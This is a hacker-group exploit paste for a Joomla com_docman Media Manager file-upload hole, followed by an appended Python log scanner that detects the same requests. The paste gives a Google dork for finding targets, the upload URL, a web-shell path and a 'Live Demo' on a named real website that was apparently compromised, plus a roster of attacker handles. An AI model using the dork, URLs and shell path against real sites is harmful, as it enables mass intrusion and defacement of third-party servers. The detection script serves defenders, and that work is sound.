Joomla (com_docman) Media Manager File Upload Vulnerability

Nov 5th, 2014
--------------------------------------------------
| https://twitter.com/ungku_nazmi |
| https://twitter.com/AnonGhostTeam |
--------------------------------------------------
Category web applications
Platform php
# Exploit Title: Joomla (com_docman) Media Manager File Upload Vulnerability
# Date: 05/11/2014
# Exploit Author: Donnazmi
# Tested on: Windows + Linux ++
# Google dork: inurl:index.php?option=com_docman
# SS : http://photouploads.com/images/comdocman.png

# Exploit

http://localhost/path/index.php/component/media/?view=images&tmpl=component&e_name=description&asset=com_docman&author=

# Shell path:
http://localhost/images/shell.php.jpg

Live Demo :
http://www.infotepsai.edu.co/index.php/component/media/?view=images&tmpl=component&e_name=description&asset=com_docman&author=

http://www.infotepsai.edu.co/images/AG.jpg

We are:Mauritania Attacker - Virusa Worm - Jih4d - AnonxoxTn - Tak Dikenal - Younes Lmaghribi - Mrlele - Mauritania K!ll3r - V0RT3X - Dr.SaM!M_008 - BillGate - RudeAt Localhost - Pr3d4T0r - X-Wanted - PhObia_PhOneyz - Mauritania InjeCtor - Donnazmi - Black Cracker - Extazy007 - M-c0d3r - DarkR00T - haxOr trojAn - Hamzah Uygun - Hellion - CoderSec - HusseiN98D - Mr.Ajword - xIdontknow - Mr HuNT3r - rummykhan - Hani Xavi - Samir inject0r - Noname-Hax0r - Mr-Domoz Ps - TRAFIQUANT - Ghostralia - Don Maverick RevCrew
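
For site owners checking their own servers: a detection sketch that scans web access logs for the two request shapes shown in the paste above (the Media Manager image view opened with asset=com_docman, and a double-extension file served from /images/). This is an added example, not part of the original paste; the combined log format, the rule names, the non-SEF option=com_media form and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx combined log format (assumed): client ip, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A name under /images/ with a script extension followed by another one,
# the shape of the "shell.php.jpg" path in the paste.
DOUBLE_EXT_RE = re.compile(
    r'/images/.*\.(?:php\d?|phtml|phar)\.[A-Za-z0-9]+$', re.I)

def classify(line):
    """Return (rule, ip, method, status) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m['target'])
    path = unquote(parts.path)  # decode %2E etc. before matching
    query = parse_qs(parts.query, keep_blank_values=True)
    hit = None
    # Media Manager image view opened with asset=com_docman (URL in the paste).
    # option=com_media is the non-SEF form of the same component (assumption).
    media = ('/component/media' in path.lower()
             or query.get('option') == ['com_media'])
    if (media and query.get('asset') == ['com_docman']
            and query.get('view') == ['images']):
        hit = 'media_manager_asset_docman'
    elif DOUBLE_EXT_RE.search(path):
        hit = 'double_extension_under_images'
    return (hit, m['ip'], m['method'], int(m['status'])) if hit else None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Nov/2014:10:00:01 +0000] "GET /index.php/component/media/?view=images&tmpl=component&e_name=description&asset=com_docman&author= HTTP/1.1" 200 5120',
    '192.0.2.10 - - [05/Nov/2014:10:00:09 +0000] "GET /images/shell.php.jpg HTTP/1.1" 200 312',
    '198.51.100.7 - - [05/Nov/2014:10:01:00 +0000] "GET /images/banner.jpg HTTP/1.1" 200 20480',
    '198.51.100.7 - - [05/Nov/2014:10:02:00 +0000] "GET /index.php?option=com_docman&task=cat_view HTTP/1.1" 200 9000',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 response on the first rule from an unauthenticated client, followed by a hit on the second rule from the same address, is the sequence worth triaging first.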